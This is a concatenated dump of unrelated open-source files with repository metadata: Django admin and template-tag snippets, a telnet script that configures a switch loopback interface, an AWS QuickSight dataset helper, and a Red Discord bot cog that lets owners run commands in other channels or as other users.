] | null | null | null | About/admin.py | Django-Development/marketing-your-own-service-on-django | 7bd4f20c1c0cd7319b546f1e09fda7c1403ec89c | [
"MIT"
] | null | null | null | About/admin.py | Django-Development/marketing-your-own-service-on-django | 7bd4f20c1c0cd7319b546f1e09fda7c1403ec89c | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import *
# Register your models here.
# Expose the About-page content models in the Django admin site.
admin.site.register(AboutItems)
admin.site.register(OurCustomers)
| 19 | 33 | 0.802632 |
fded30c60a38056298d6bfa20b56f493ec52b467 | 216 | py | Python | hokudai_furima/matching_offer/templatetags/details_images_carousel.py | TetsuFe/hokuma | b981a52b3bf8d7268bf791c5827bbe8af90afef6 | [
"MIT"
] | 1 | 2021-02-13T03:51:42.000Z | 2021-02-13T03:51:42.000Z | hokudai_furima/matching_offer/templatetags/details_images_carousel.py | TetsuFe/hokuma | b981a52b3bf8d7268bf791c5827bbe8af90afef6 | [
"MIT"
] | null | null | null | hokudai_furima/matching_offer/templatetags/details_images_carousel.py | TetsuFe/hokuma | b981a52b3bf8d7268bf791c5827bbe8af90afef6 | [
"MIT"
] | 1 | 2021-09-18T09:25:48.000Z | 2021-09-18T09:25:48.000Z | from django import template
register = template.Library()


@register.inclusion_tag('matching_offer/_details_images_carousel.html')
def details_images_carousel(details_images):
    """Render the details-images carousel partial with the given images."""
    context = {'images': details_images}
    return context
| 24 | 71 | 0.814815 |
3770b04d765f2ab5efa1bbf950c464f147d0e0c9 | 459 | py | Python | arista.py | snehapatekar1/sneha | a4b9eea1915e8f35ec8695f037608e9b9f6e4ad6 | [
"Apache-2.0"
] | null | null | null | arista.py | snehapatekar1/sneha | a4b9eea1915e8f35ec8695f037608e9b9f6e4ad6 | [
"Apache-2.0"
] | null | null | null | arista.py | snehapatekar1/sneha | a4b9eea1915e8f35ec8695f037608e9b9f6e4ad6 | [
"Apache-2.0"
] | null | null | null | import getpass
import sys
import telnetlib
HOST="192.168.146.150"
user=raw_input("Enter your username:")
password=getpass.getpass()
tn=telnetlib.Telnet(HOST, timeout=5)
tn.read_until("Username:")
tn.write(user+"\n")
if password:
tn.read_until("Password:")
tn.write(password+"\n")
tn.write("en\n")
tn.write("conf t\n")
tn.write("int lo 0\n")
tn.write("ip address 1.1.1.1 255.255.255.255\n")
tn.write("end\n")
tn.write("exit\n")
print tn.read_all()
| 19.125 | 48 | 0.697168 |
8346226b6fc2b56b07e4d812380750bfefedfd75 | 6,120 | py | Python | source/lambda/quicksight-custom-resources/util/dataset.py | awslabs/aws-devops-monitoring-dashboard | 26a75acb2a5bf006e6dd86f9f6608a5c56a11258 | [
"Apache-2.0"
] | 39 | 2021-03-26T17:20:41.000Z | 2021-09-11T16:19:37.000Z | source/lambda/quicksight-custom-resources/util/dataset.py | awslabs/aws-devops-monitoring-dashboard | 26a75acb2a5bf006e6dd86f9f6608a5c56a11258 | [
"Apache-2.0"
] | 11 | 2021-03-25T18:33:56.000Z | 2021-07-27T12:58:44.000Z | source/lambda/quicksight-custom-resources/util/dataset.py | awslabs/aws-devops-monitoring-dashboard | 26a75acb2a5bf006e6dd86f9f6608a5c56a11258 | [
"Apache-2.0"
] | 4 | 2021-06-09T18:56:17.000Z | 2021-09-05T16:49:22.000Z | # #####################################################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance #
# with the License. A copy of the License is located at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# or in the 'license' file accompanying this file. This file is distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES #
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions #
# and limitations under the License. #
# #####################################################################################################################
from tenacity import retry, retry_if_exception_type, stop_after_attempt
from util.helpers import get_quicksight_client
from util.logging import get_logger
from util.quicksight_resource import QuickSightFailure, QuickSightResource
logger = get_logger(__name__)
class DataSet(QuickSightResource):
    """A QuickSight data set resource.

    Builds its Physical/Logical table maps from local config for the given
    sub type, patches in the owning data source's arn (and optionally a
    schema override), and creates/deletes the data set via the QuickSight API.
    """

    def __init__(
        self, quicksight_application=None, data_source=None, data_set_sub_type=None, props=None
    ):
        # data_source: the DataSource resource whose arn is written into every
        # PhysicalTableMap entry at creation time.
        super().__init__(quicksight_application=quicksight_application, type = "dataset", sub_type=data_set_sub_type, props=props)
        self.use_props(props)
        self.data_source = data_source
        # override to set schema name directly
        # instead of using the one in the config file
        self.schema = None
        self.config_data = dict()
        self._load_config(self.type, quicksight_application.get_supported_data_set_sub_types(), self.config_data)

    def create(self):
        """Create the data set in QuickSight.

        Raises ValueError if no data source was supplied; returns the API
        response from create_data_set (or describe_data_set if it existed).
        """
        if not self.data_source:
            raise ValueError("missing datasource value when creating dataset")
        logger.info(f"creating quicksight dataset id:{self.id}")
        physical_table_map = self._get_map(self.sub_type, "PhysicalTableMap")
        logical_table_map = self._get_map(self.sub_type, "LogicalTableMap")
        response = self._create_data_set(physical_table_map, logical_table_map)
        return response

    def delete(self):
        """Delete the data set and remember the arn reported by the API."""
        logger.info(f"deleting quicksight dataset id:{self.id}")
        quicksight_client = get_quicksight_client()
        response = quicksight_client.delete_data_set(AwsAccountId=self.aws_account_id, DataSetId=self.id)
        logger.info(f"finished deleting quicksight dataset for id:{self.id}, " f"response:{response}")
        self.arn = response["Arn"]
        return response

    @retry(retry=retry_if_exception_type(QuickSightFailure), stop=stop_after_attempt(3))
    def _create_data_set(self, physical_table_map, logical_table_map):
        """Issue the create_data_set call.

        Idempotent: falls back to describe_data_set when the data set already
        exists. InvalidParameterValueException is re-raised as
        QuickSightFailure so the @retry decorator re-attempts (up to 3 times).
        """
        quicksight_client = get_quicksight_client()
        # Patch the templated maps before sending them to the API.
        self._update_data_source_arn(physical_table_map)
        self._update_schema(physical_table_map)
        try:
            response = quicksight_client.create_data_set(
                AwsAccountId=self.aws_account_id,
                DataSetId=self.id,
                Name=self.name,
                Permissions=self._get_permissions(),
                PhysicalTableMap=physical_table_map,
                LogicalTableMap=logical_table_map,
                ImportMode="DIRECT_QUERY",
            )
            logger.info(f"finished creating quicksight create_data_set id:{self.id}, " f"response:{response}")
        except quicksight_client.exceptions.ResourceExistsException:
            # Already created (e.g. by an earlier retry): describe instead.
            logger.info(f"dataset for id:{self.id} already exists")
            response = quicksight_client.describe_data_set(AwsAccountId=self.aws_account_id, DataSetId=self.id)
            response = response["DataSet"]
        except quicksight_client.exceptions.InvalidParameterValueException as exc:
            logger.error(str(exc))
            raise QuickSightFailure()
        self.arn = response["Arn"]
        return response

    def _get_permissions(self):
        """Return the permissions list granting the principal full data set actions."""
        # The principal is the owner of the resource and create the resources and is given full actions for the type
        permissions = [
            {
                "Principal": self.principal_arn,
                "Actions": [
                    "quicksight:DescribeDataSet",
                    "quicksight:DescribeDataSetPermissions",
                    "quicksight:PassDataSet",
                    "quicksight:DescribeIngestion",
                    "quicksight:ListIngestions",
                    "quicksight:UpdateDataSet",
                    "quicksight:DeleteDataSet",
                    "quicksight:CreateIngestion",
                    "quicksight:CancelIngestion",
                    "quicksight:UpdateDataSetPermissions",
                ],
            }
        ]
        return permissions

    def _update_schema(self, obj):
        """Overwrite RelationalTable.Schema in every entry of ``obj`` with
        self.schema when it is set; otherwise keep the config-file values."""
        if not self.schema:
            logger.debug(f"Schema name is not set in object. Using the ones from config file as is in RelationalTable[].Schema in PhysicalTableMap")
            return
        for (key, value) in obj.items():
            logger.debug(f"Updating schema arn value of RelationalTable.Schema in {key} PhysicalTableMap")
            value["RelationalTable"]["Schema"] = self.schema

    def _update_data_source_arn(self, obj):
        """Point RelationalTable.DataSourceArn of every entry at self.data_source.arn."""
        for (key, value) in obj.items():
            logger.debug(f"Updating datasource arn value of RelationalTable.DataSourceArn in {key} PhysicalTableMap")
            value["RelationalTable"]["DataSourceArn"] = self.data_source.arn
| 51 | 148 | 0.576144 |
ec2a9136d42ebe043e9c0e8bf8539911439a1bca | 31,135 | py | Python | cmdchannel/cmdchannel.py | AAA3A-AAA3A/AAA3A-cogs | 076ff390610e2470a086bdae41647ee21f01c323 | [
"MIT"
] | 1 | 2022-03-17T02:06:37.000Z | 2022-03-17T02:06:37.000Z | cmdchannel/cmdchannel.py | AAA3A-AAA3A/AAA3A-cogs | 076ff390610e2470a086bdae41647ee21f01c323 | [
"MIT"
] | 2 | 2022-03-07T03:29:33.000Z | 2022-03-17T06:51:43.000Z | cmdchannel/cmdchannel.py | AAA3A-AAA3A/AAA3A-cogs | 076ff390610e2470a086bdae41647ee21f01c323 | [
"MIT"
] | 2 | 2021-11-24T19:31:55.000Z | 2022-01-02T06:34:22.000Z | from .AAA3A_utils.cogsutils import CogsUtils # isort:skip
from redbot.core import commands # isort:skip
from redbot.core.i18n import Translator, cog_i18n # isort:skip
from redbot.core.bot import Red # isort:skip
import discord # isort:skip
import typing # isort:skip
from redbot.core import Config
# Credits:
# Thanks to @epic guy on Discord for the basic syntax (command groups, commands) and also commands (await ctx.send, await ctx.author.send, await ctx.message.delete())!
# Thanks to TrustyJAID for the code (a bit modified to work here and to improve as needed) for the log messages sent! (https://github.com/TrustyJAID/Trusty-cogs/tree/master/extendedmodlog)
# Thanks to Kreusada for the code (with modifications to make it work and match the syntax of the rest) to add a log channel or remove it if no channel is specified! (https://github.com/Kreusada/Kreusada-Cogs/tree/master/captcha)
# Thanks to the developers of the cogs I added features to as it taught me how to make a cog! (Chessgame by WildStriker, Captcha by Kreusada, Speak by Epic guy and Rommer by Dav)
# Thanks to all the people who helped me with some commands in the #coding channel of the redbot support server!
_ = Translator("CmdChannel", __file__)
@cog_i18n(_)
class CmdChannel(commands.Cog):
    """A cog to send the result of a command to another channel!"""

    def __init__(self, bot):
        # Per-guild settings are stored in Red's Config under this identifier.
        self.bot: Red = bot
        self.config: Config = Config.get_conf(
            self,
            identifier=793502759720,
            force_registration=True,
        )
        # Defaults: one enabled/confirmation/deletemessage/information
        # quadruplet per imitation command (cmdchannel/cmduser/cmduserchannel).
        self.cmd_guild = {
            "logschannel": None,  # The channel for logs.
            "enabled_cmdchannel": True,  # Enable the possibility of commands.
            "confirmation_cmdchannel": False,  # Enable the confirmation.
            "deletemessage_cmdchannel": False,  # Enable the message delete.
            "informationmessage_cmdchannel": False,  # Enable the information message.
            "enabled_cmduser": True,  # Enable the possibility of commands.
            "confirmation_cmduser": False,  # Enable the confirmation.
            "deletemessage_cmduser": False,  # Enable the message delete.
            "informationmessage_cmduser": False,  # Enable the information message.
            "enabled_cmduserchannel": True,  # Enable the possibility of commands.
            "confirmation_cmduserchannel": False,  # Enable the confirmation.
            "deletemessage_cmduserchannel": False,  # Enable the message delete.
            "informationmessage_cmduserchannel": False,  # Enable the information message.
        }
        self.config.register_guild(**self.cmd_guild)
        self.cogsutils = CogsUtils(cog=self)
        self.cogsutils._setup()
    @commands.guild_only()
    @commands.mod()
    @commands.command(aliases=["channelcmd"])
    async def cmdchannel(self, ctx: commands.Context, guild: typing.Optional[discord.Guild]=None, channel: typing.Optional[typing.Union[discord.TextChannel, int]]=None, *, command: str = ""):
        """Act as if the command had been typed in the channel of your choice.

        The prefix must be entered if it is a command. Otherwise, it will be a message only.
        If you do not specify a channel, the current one will be used, unless the command you want to use is the name of an existing channel (help or test for example).
        """
        # Resolve a raw channel id: a cross-guild id needs an explicit guild.
        if channel is not None:
            if isinstance(channel, int):
                if guild is not None:
                    channel = guild.get_channel(channel)
                else:
                    if ctx.author.id in ctx.bot.owner_ids:
                        await ctx.send(_("Please specify a server if you want to use a command in another server.").format(**locals()))
                        return
                    else:
                        # Non-owners fall back to the current channel.
                        channel = None
        if channel is None:
            channel = ctx.channel
        guild = channel.guild
        # Cross-guild execution is restricted to bot owners who are members there.
        if channel not in ctx.guild.channels and ctx.author.id not in ctx.bot.owner_ids:
            await ctx.send(_("Only a bot owner can use a command from another server.").format(**locals()))
            return
        member = guild.get_member(ctx.author.id)
        if member is None:
            await ctx.send(_("To send commands to another server, you must be there.").format(**locals()))
            return
        if not command and not ctx.message.embeds and not ctx.message.attachments:
            await ctx.send_help()
            return
        config = await self.config.guild(guild).all()
        logschannel = config["logschannel"]
        actual_state_enabled = config["enabled_cmdchannel"]
        actual_state_confirmation = config["confirmation_cmdchannel"]
        actual_state_deletemessage = config["deletemessage_cmdchannel"]  # NOTE(review): read but never used in this command
        actual_state_information = config["informationmessage_cmdchannel"]
        cmd_colour = await self.bot.get_embed_colour(guild.text_channels[0])
        if actual_state_enabled:
            # The invoker must themselves be able to read/send in the target channel.
            permissions = channel.permissions_for(ctx.author)
            if permissions.read_messages and permissions.send_messages:
                if actual_state_information:
                    await channel.send(_("The command issued in this channel is:\n```{command}```").format(**locals()))
                if logschannel:
                    # Audit entry: who imitated what, where, and whether the
                    # command would pass its own checks.
                    can_run = await self.member_can_run(ctx)
                    # NOTE(review): this description is a plain f-string while the
                    # cmduser/cmduserchannel equivalents are translated — confirm.
                    embed = discord.Embed(
                        description=f"CmdChannel - Command used: {command}",
                        colour=cmd_colour,
                    )
                    embed.add_field(name=(_("Imitated user").format(**locals())), value=ctx.author.mention)
                    embed.add_field(name=(_("Channel").format(**locals())), value=channel.mention)
                    embed.add_field(name=(_("Can Run").format(**locals())), value=str(can_run))
                    author_title = _("{ctx.author} ({ctx.author.id}) - Used a Command").format(**locals())
                    embed.set_author(name=author_title, icon_url=ctx.author.display_avatar if self.cogsutils.is_dpy2 else ctx.author.avatar_url)
                    logschannel = ctx.bot.get_channel(logschannel)
                    await logschannel.send(embed=embed)
                await self.cogsutils.invoke_command(author=ctx.author, channel=channel, command=command)
                if actual_state_confirmation:
                    # Prefer a DM; fall back to the invoking channel if DMs are closed.
                    try:
                        await ctx.author.send(_("The `{command}` command has been launched in the {channel} channel. You can check if it worked.").format(**locals()))
                    except discord.Forbidden:
                        await ctx.send(_("The `{command}` command has been launched in the {channel} channel. You can check if it worked.").format(**locals()))
            else:
                try:
                    await ctx.author.send(_("You cannot run this command because you do not have the permissions to send messages in the {channel} channel.").format(**locals()))
                except discord.Forbidden:
                    await ctx.send(_("You cannot run this command because you do not have the permissions to send messages in the {channel} channel.").format(**locals()))
        else:
            try:
                await ctx.author.send(_("CommandChannel have been disabled by an administrator of this server.").format(**locals()))
            except discord.Forbidden:
                await ctx.send(_("CommandChannel have been disabled by an administrator of this server.").format(**locals()))
        return
    @commands.guild_only()
    @commands.is_owner()
    @commands.command(aliases=["usercmd"])
    async def cmduser(self, ctx: commands.Context, user: typing.Optional[discord.Member]=None, *, command: str = ""):
        """Act as if the command had been typed by imitating the specified user.

        The prefix must be entered if it is a command. Otherwise, it will be a message only.
        If you do not specify a user, the author will be used.
        """
        if user is None:
            user = ctx.author
        if not command and not ctx.message.embeds and not ctx.message.attachments:
            await ctx.send_help()
            return
        config = await self.config.guild(ctx.guild).all()
        logschannel = config["logschannel"]
        actual_state_enabled = config["enabled_cmduser"]
        actual_state_confirmation = config["confirmation_cmduser"]
        actual_state_deletemessage = config["deletemessage_cmduser"]  # NOTE(review): read but never used here
        actual_state_information = config["informationmessage_cmduser"]
        cmd_colour = await self.bot.get_embed_colour(ctx.guild.text_channels[0])
        if actual_state_enabled:
            # The invoker must be able to read/send in the current channel.
            permissions = ctx.channel.permissions_for(ctx.author)
            if permissions.read_messages and permissions.send_messages:
                if actual_state_information:
                    await ctx.channel.send(_("The command issued in this channel is:\n```{command}```").format(**locals()))
                if logschannel:
                    # Audit entry for the imitation.
                    can_run = await self.member_can_run(ctx)
                    embed = discord.Embed(
                        description=_("CmdUser - Command used: {command}").format(**locals()),
                        colour=cmd_colour,
                    )
                    embed.add_field(name=(_("Imitated user").format(**locals())), value=user)
                    embed.add_field(name=(_("Channel").format(**locals())), value=ctx.channel.mention)
                    embed.add_field(name=(_("Can Run").format(**locals())), value=str(can_run))
                    author_title = _("{ctx.author} ({ctx.author.id}) - Used a Command").format(**locals())
                    embed.set_author(name=author_title, icon_url=ctx.author.display_avatar if self.cogsutils.is_dpy2 else ctx.author.avatar_url)
                    logschannel = ctx.bot.get_channel(logschannel)
                    await logschannel.send(embed=embed)
                # Run the command as the imitated user in the current channel.
                await self.cogsutils.invoke_command(author=user, channel=ctx.channel, command=command)
                if actual_state_confirmation:
                    try:
                        await ctx.author.send(_("The `{command}` command has been launched in the {ctx.channel} channel by imitating the {user} user. You can check if it worked.").format(**locals()))
                    except discord.Forbidden:
                        await ctx.send(_("The `{command}` command has been launched in the {ctx.channel} channel by imitating the {user} user. You can check if it worked.").format(**locals()))
            else:
                try:
                    await ctx.author.send(_("You cannot run this command because you do not have the permissions to send messages in the {ctx.channel} channel.").format(**locals()))
                except discord.Forbidden:
                    await ctx.send(_("You cannot run this command because you do not have the permissions to send messages in the {ctx.channel} channel.").format(**locals()))
        else:
            try:
                await ctx.author.send(_("CommandUser have been disabled by an administrator of this server.").format(**locals()))
            except discord.Forbidden:
                await ctx.send(_("CommandUser have been disabled by an administrator of this server.").format(**locals()))
        return
    @commands.guild_only()
    @commands.is_owner()
    @commands.command(aliases=["userchannelcmd"])
    async def cmduserchannel(self, ctx: commands.Context, user: typing.Optional[discord.Member]=None, channel: typing.Optional[discord.TextChannel]=None, *, command: str = ""):
        """Act as if the command had been typed in the channel of your choice by imitating the specified user.

        The prefix must be entered if it is a command. Otherwise, it will be a message only.
        If you do not specify a user, the author will be used.
        """
        if channel is None:
            channel = ctx.channel
        if user is None:
            user = ctx.author
        if not command and not ctx.message.embeds and not ctx.message.attachments:
            await ctx.send_help()
            return
        config = await self.config.guild(ctx.guild).all()
        logschannel = config["logschannel"]
        actual_state_enabled = config["enabled_cmduserchannel"]
        actual_state_confirmation = config["confirmation_cmduserchannel"]
        actual_state_deletemessage = config["deletemessage_cmduserchannel"]  # NOTE(review): read but never used here
        actual_state_information = config["informationmessage_cmduserchannel"]
        cmd_colour = await self.bot.get_embed_colour(ctx.guild.text_channels[0])
        if actual_state_enabled:
            # The invoker must be able to read/send in the target channel.
            permissions = channel.permissions_for(ctx.author)
            if permissions.read_messages and permissions.send_messages:
                if actual_state_information:
                    await channel.send(_("The command issued in this channel is:\n```{command}```").format(**locals()))
                if logschannel:
                    # Audit entry for the imitation.
                    can_run = await self.member_can_run(ctx)
                    embed = discord.Embed(
                        description=_("CmdUserChannel - Command used: {command}").format(**locals()),
                        colour=cmd_colour,
                    )
                    embed.add_field(name=(_("Imitated user").format(**locals())), value=user)
                    embed.add_field(name=(_("Channel").format(**locals())), value=channel.mention)
                    embed.add_field(name=(_("Can Run").format(**locals())), value=str(can_run))
                    author_title = _("{ctx.author} ({ctx.author.id}) - Used a Command").format(**locals())
                    embed.set_author(name=author_title, icon_url=ctx.author.display_avatar if self.cogsutils.is_dpy2 else ctx.author.avatar_url)
                    logschannel = ctx.bot.get_channel(logschannel)
                    await logschannel.send(embed=embed)
                # Run the command as the imitated user in the chosen channel.
                await self.cogsutils.invoke_command(author=user, channel=channel, command=command)
                if actual_state_confirmation:
                    try:
                        await ctx.author.send(_("The `{command}` command has been launched in the {channel} channel by imitating the {user} user. You can check if it worked.").format(**locals()))
                    except discord.Forbidden:
                        await ctx.send(_("The `{command}` command has been launched in the {channel} channel by imitating the {user} user. You can check if it worked.").format(**locals()))
            else:
                try:
                    await ctx.author.send(_("You cannot run this command because you do not have the permissions to send messages in the {channel} channel.").format(**locals()))
                except discord.Forbidden:
                    await ctx.send(_("You cannot run this command because you do not have the permissions to send messages in the {channel} channel.").format(**locals()))
        else:
            try:
                await ctx.author.send(_("CommandUserChannel have been disabled by an administrator of this server.").format(**locals()))
            except discord.Forbidden:
                await ctx.send(_("CommandUserChannel have been disabled by an administrator of this server.").format(**locals()))
        return
@commands.command()
async def testvar(self, ctx: commands.Context):
"""Test variables.
"""
embed: discord.Embed = discord.Embed()
embed.title = _("Testvar").format(**locals())
embed.description = _("Variables:").format(**locals())
embed.add_field(
name=_("Author:").format(**locals()),
value=f"{ctx.author}")
embed.add_field(
name=_("Channel:").format(**locals()),
value=f"{ctx.channel}")
await ctx.send(embed=embed)
    @commands.guild_only()
    @commands.guildowner_or_permissions(administrator=True)
    @commands.group(name="cmdset", aliases=["setcmd"])
    async def configuration(self, ctx: commands.Context):
        """Configure Command for your server."""
        # Group stub: all settings live in the subcommands below.
@configuration.command(aliases=["lchann", "lchannel", "logschan", "logchannel", "logsc"], usage="<text_channel_or_'none'>")
async def logschannel(self, ctx: commands.Context, *, channel: typing.Optional[discord.TextChannel]=None):
"""Set a channel where events are registered.
``channel``: Text channel.
You can also use "None" if you wish to remove the logging channel.
"""
if not ctx.author.id == ctx.guild.owner.id:
await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
return
if channel is None:
await self.config.guild(ctx.guild).logschannel.clear()
await ctx.send(_("Logging channel removed.").format(**locals()))
return
needperm = await self.check_permissions_in_channel(["embed_links", "read_messages", "read_message_history", "send_messages", "attach_files"], channel)
if needperm:
await ctx.send(_("The bot does not have at least one of the following permissions in this channel: `embed_links`, `read_messages`, `read_message_history`, `send_messages`, `attach_files`.")).format(**locals())
return
await self.config.guild(ctx.guild).logschannel.set(channel.id)
await ctx.send(_("Logging channel registered: {channel.mention}.").format(**locals()))
async def check_permissions_in_channel(self, permissions: typing.List[str], channel: discord.TextChannel):
"""Function to checks if the permissions are available in a guild.
This will return a list of the missing permissions.
"""
return [
permission
for permission in permissions
if not getattr(channel.permissions_for(channel.guild.me), permission)
]
    @commands.guildowner_or_permissions(administrator=True)
    @configuration.group(name="cmdchannel", aliases=["channelcmd"])
    async def cmdchannelconfig(self, ctx: commands.Context):
        """Configure CmdChannel for your server."""

    @cmdchannelconfig.command(name="enable", aliases=["activate"], usage="<true_or_false>")
    async def activatecmdchannel(self, ctx: commands.Context, state: bool):
        """Enable or disable CommandChannel.

        Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
        """
        # Hard guild-owner gate on top of the group's admin permission check.
        if not ctx.author.id == ctx.guild.owner.id:
            await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
            return
        config = await self.config.guild(ctx.guild).all()
        actual_state_enabled = config["enabled_cmdchannel"]
        # No-op when the setting already matches the requested state.
        if actual_state_enabled is state:
            await ctx.send(_("CommandChannel is already set on {state}.").format(**locals()))
            return
        await self.config.guild(ctx.guild).enabled_cmdchannel.set(state)
        await ctx.send(_("CommandChannel state registered: {state}.").format(**locals()))
@cmdchannelconfig.command(name="confirmation", aliases=["confirm"], usage="<true_or_false>")
async def confirmationcmdchannel(self, ctx: commands.Context, state: bool):
"""Enable or disable confirmation.
Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
"""
if not ctx.author.id == ctx.guild.owner.id:
await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
return
config = await self.config.guild(ctx.guild).all()
actual_state_confirmation = config["confirmation_cmdchannel"]
if actual_state_confirmation is state:
await ctx.send(_("Confirmation is already set on {state}.").format(**locals()))
return
await self.config.guild(ctx.guild).confirmation_cmdchannel.set(state)
await ctx.send(f"Confirmation state registered: {state}.")
    @cmdchannelconfig.command(name="delete", aliases=["deletemessage"], usage="<true_or_false>")
    async def deletemessagecmdchannel(self, ctx: commands.Context, state: bool):
        """Enable or disable message delete.

        Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
        """
        # Hard guild-owner gate on top of the group's admin permission check.
        if not ctx.author.id == ctx.guild.owner.id:
            await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
            return
        config = await self.config.guild(ctx.guild).all()
        actual_state_delete = config["deletemessage_cmdchannel"]
        if actual_state_delete is state:
            await ctx.send(_("Message delete is already set on {state}.").format(**locals()))
            return
        await self.config.guild(ctx.guild).deletemessage_cmdchannel.set(state)
        await ctx.send(_("Message delete state registered: {state}.").format(**locals()))

    @cmdchannelconfig.command(name="information", aliases=["info"], usage="<true_or_false>")
    async def informationcmdchannel(self, ctx: commands.Context, state: bool):
        """Enable or disable information message.

        Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
        """
        if not ctx.author.id == ctx.guild.owner.id:
            await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
            return
        config = await self.config.guild(ctx.guild).all()
        actual_state_information = config["informationmessage_cmdchannel"]
        if actual_state_information is state:
            await ctx.send(_("Information message is already set on {state}.").format(**locals()))
            return
        await self.config.guild(ctx.guild).informationmessage_cmdchannel.set(state)
        await ctx.send(_("Information message state registered: {state}.").format(**locals()))
    @commands.guildowner_or_permissions(administrator=True)
    @configuration.group(name="cmduser", aliases=["usercmd"])
    async def cmduserconfig(self, ctx: commands.Context):
        """Configure CmdUser for your server."""

    @cmduserconfig.command(name="enable", aliases=["activate"], usage="<true_or_false>")
    async def activatecmduser(self, ctx: commands.Context, state: bool):
        """Enable or disable CommandUser.

        Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
        """
        # Hard guild-owner gate on top of the group's admin permission check.
        if not ctx.author.id == ctx.guild.owner.id:
            await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
            return
        config = await self.config.guild(ctx.guild).all()
        actual_state_enabled = config["enabled_cmduser"]
        if actual_state_enabled is state:
            await ctx.send(_("CommandUser is already set on {state}.").format(**locals()))
            return
        await self.config.guild(ctx.guild).enabled_cmduser.set(state)
        await ctx.send(_("CommandUser state registered: {state}.").format(**locals()))

    @cmduserconfig.command(name="confirmation", aliases=["confirm"], usage="<true_or_false>")
    async def confirmationcmduser(self, ctx: commands.Context, state: bool):
        """Enable or disable confirmation.

        Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
        """
        if not ctx.author.id == ctx.guild.owner.id:
            await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
            return
        config = await self.config.guild(ctx.guild).all()
        actual_state_confirmation = config["confirmation_cmduser"]
        if actual_state_confirmation is state:
            await ctx.send(_("CommandUser confirmation is already set on {state}.").format(**locals()))
            return
        await self.config.guild(ctx.guild).confirmation_cmduser.set(state)
        await ctx.send(_("CommandUser confirmation state registered: {state}.").format(**locals()))

    @cmduserconfig.command(name="delete", aliases=["deletemessage"], usage="<true_or_false>")
    async def deletemessagecmduser(self, ctx: commands.Context, state: bool):
        """Enable or disable message delete.

        Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
        """
        if not ctx.author.id == ctx.guild.owner.id:
            await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
            return
        config = await self.config.guild(ctx.guild).all()
        actual_state_delete = config["deletemessage_cmduser"]
        if actual_state_delete is state:
            await ctx.send(_("CommandUser message delete is already set on {state}.").format(**locals()))
            return
        await self.config.guild(ctx.guild).deletemessage_cmduser.set(state)
        await ctx.send(_("CommandUser message delete state registered: {state}.").format(**locals()))

    @cmduserconfig.command(name="information", aliases=["info"], usage="<true_or_false>")
    async def informationcmduser(self, ctx: commands.Context, state: bool):
        """Enable or disable information message.

        Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
        """
        if not ctx.author.id == ctx.guild.owner.id:
            await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
            return
        config = await self.config.guild(ctx.guild).all()
        actual_state_information = config["informationmessage_cmduser"]
        if actual_state_information is state:
            await ctx.send(_("CommandUser information message is already set on {state}.").format(**locals()))
            return
        await self.config.guild(ctx.guild).informationmessage_cmduser.set(state)
        await ctx.send(_("CommandUser information message state registered: {state}.").format(**locals()))
    @commands.guildowner_or_permissions(administrator=True)
    @configuration.group(name="cmduserchannel", aliases=["userchannelcmd"])
    async def cmduserchannelconfig(self, ctx: commands.Context):
        """Configure CmdUserChannel for your server."""

    @cmduserchannelconfig.command(name="enable", aliases=["activate"], usage="<true_or_false>")
    async def activatecmduserchannel(self, ctx: commands.Context, state: bool):
        """Enable or disable CommandUserChannel.

        Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
        """
        # Hard guild-owner gate on top of the group's admin permission check.
        if not ctx.author.id == ctx.guild.owner.id:
            await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
            return
        config = await self.config.guild(ctx.guild).all()
        actual_state_enabled = config["enabled_cmduserchannel"]
        if actual_state_enabled is state:
            await ctx.send(_("CommandUserChannel is already set on {state}.").format(**locals()))
            return
        await self.config.guild(ctx.guild).enabled_cmduserchannel.set(state)
        await ctx.send(_("CommandUserChannel state registered: {state}.").format(**locals()))
@cmduserchannelconfig.command(name="confirmation", aliases=["confirm"], usage="<true_or_false>")
async def confirmationcmduserchannel(self, ctx: commands.Context, state: bool):
"""Enable or disable confirmation.
Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
"""
if not ctx.author.id == ctx.guild.owner.id:
await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
return
config = await self.config.guild(ctx.guild).all()
actual_state_confirmation = config["confirmation_cmduserchannel"]
if actual_state_confirmation is state:
await ctx.send(_("CommandUserChannel confirmation is already set on {state}."))
return
await self.config.guild(ctx.guild).confirmation_cmduserchannel.set(state)
await ctx.send(_("CommandUserChannel confirmation state registered: {state}.").format(**locals()))
    @cmduserchannelconfig.command(name="delete", aliases=["deletemessage"], usage="<true_or_false>")
    async def deletemessagecmduserchannel(self, ctx: commands.Context, state: bool):
        """Enable or disable message delete.

        Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
        """
        # Hard guild-owner gate on top of the group's admin permission check.
        if not ctx.author.id == ctx.guild.owner.id:
            await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
            return
        config = await self.config.guild(ctx.guild).all()
        actual_state_delete = config["deletemessage_cmduserchannel"]
        if actual_state_delete is state:
            await ctx.send(_("CommandUserChannel message delete is already set on {state}.").format(**locals()))
            return
        await self.config.guild(ctx.guild).deletemessage_cmduserchannel.set(state)
        await ctx.send(_("CommandUserChannel message delete state registered: {state}.").format(**locals()))

